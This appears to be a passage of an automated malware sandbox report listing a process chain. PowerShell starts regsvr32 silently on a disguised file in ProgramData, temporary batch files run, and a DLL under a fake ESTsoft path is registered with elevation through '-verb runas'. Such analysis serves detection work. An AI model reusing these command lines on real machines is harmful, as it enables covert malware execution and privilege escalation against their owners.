Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas | |